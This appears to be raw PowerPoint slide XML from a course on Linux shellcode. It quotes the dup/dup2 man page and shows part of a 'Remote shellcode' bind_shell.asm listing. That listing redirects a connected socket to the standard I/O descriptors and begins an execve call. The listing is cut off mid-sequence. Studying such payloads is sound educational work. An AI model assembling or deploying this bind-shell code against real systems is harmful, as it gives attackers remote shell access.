              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DUP(2)                     Linux Programmer's Manual                     DUP(2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       dup, dup2 - duplicate a file descriptor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SYNOPSIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       #include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> dup(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oldfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> dup2(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oldfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>newfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DESCRIPTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       dup() and dup2() create a copy of the file descriptor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oldfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       dup2() makes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>newfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> be the copy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oldfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, closing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>newfd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> first if necessary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52359550"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Added to the previous bind_shell.asm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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smtClean="0"/>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1551220"/>
            <a:ext cx="7704856" cy="3967753"/>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050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; dup2(connected socket, {all three standard I/O file descriptors})</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; Move socket FD in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push BYTE 0x3F    ; dup2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #63</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0 = standard input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; dup(c, 0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> BYTE al, 0x3F ; dup2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #63</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 1 = standard output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; dup(c, 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> BYTE al, 0x3F ; dup2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #63</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 2 = standard error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; dup(c, 2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> char *filename, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [], char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> BYTE al, 11   ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
